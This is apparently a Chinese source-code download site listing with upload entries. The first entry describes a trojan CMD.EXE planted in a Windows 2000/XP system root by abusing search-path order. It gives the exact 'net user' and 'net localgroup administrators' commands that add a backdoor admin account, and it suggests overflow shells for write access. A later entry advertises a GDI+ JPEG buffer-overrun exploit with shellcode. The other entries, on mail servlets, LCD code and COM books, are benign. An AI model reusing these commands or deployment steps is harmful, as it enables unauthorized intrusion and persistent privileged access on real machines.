你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.COm /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkerCOm /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-12
上传用户:qlpqlq
1:文件说明: ExampleServlet.java 发信JAVA源文件 CSEmail.jar 发信包 COm CSEmail.jar 的源文件 2:部署: ExampleServlet.java 发到 WEB-INF/CLASSES/ CSEmail.jar 放到 web-inf/lib/ 3. 修改ExampleServlet.java 中 private String SERVLET_HTTP_PATH = "http://www.yourSite.COm/servlet/ 把www.yourSite.COm 改成你的网址 4运行: http://www.yourSite.COm/servlet/ExampleServlet 填写你的SMTP邮件服务器和发信端口,还有你在这个邮件服务器上的帐号(不正确发不出信)
标签: ExampleServlet CSEmail java jar
上传时间: 2015-01-12
上传用户:cx111111
胡家荣(hjr7581@163.COm)用KEIL写的的几个LCD、串口等方面的程序
上传时间: 2013-12-26
上传用户:ma1301115706
MultiUse COm object that can be used to administer, send and retrieve mail by Shawn Anderson
标签: administer MultiUse Anderson retrieve
上传时间: 2014-01-17
上传用户:talenthn
李刚 请赶快放开我的权限 我上载的源码都是很精湛的,请查阅,qing请加我 li_xue_ming@msn.COm必要的话可以和我在线沟通
标签: li_xue_ming qing COm msn
上传时间: 2015-01-13
上传用户:lizhen9880
COm组件式编程
上传时间: 2015-01-14
上传用户:wlcaption
ERWIN绝好的数据库建模工具,可以把数据模型导入数据库如sql server foxpro等这里是方法指南更多内容可以去http://erwin.softwarechn.COm/_script/showfull.asp?Board=method&Tabname=erwin
标签: softwarechn server foxpro script
上传时间: 2013-12-06
上传用户:c12228
反编译class文件工具 yzwang@lnteleCOm.COm
标签: lnteleCOm yzwang class COm
上传时间: 2013-11-27
上传用户:zhouli
久负盛名的COm本质论
标签: COm
上传时间: 2015-01-20
上传用户:heart520beat
工具分类:攻击程序 运行平台:Windows 工具大小:7577 Bytes 文件MD5 :28f6d5f4d818438522a3d0dc8a3fa46b 工具来源:securiteam.COm // GDI+ buffer overrun exploit by FoToZ // NB: the headers here are only sample headers taken from a .JPG file, // with the FF FE 00 01 inserted in header1. // Sample shellcode is provided // You can put approx. 2500 bytes of shellcode...who needs that much anyway // Tested on an unpatched WinXP SP1
标签: 818438522a d818438522 securiteam 818438522
上传时间: 2015-01-20
上传用户:Late_Li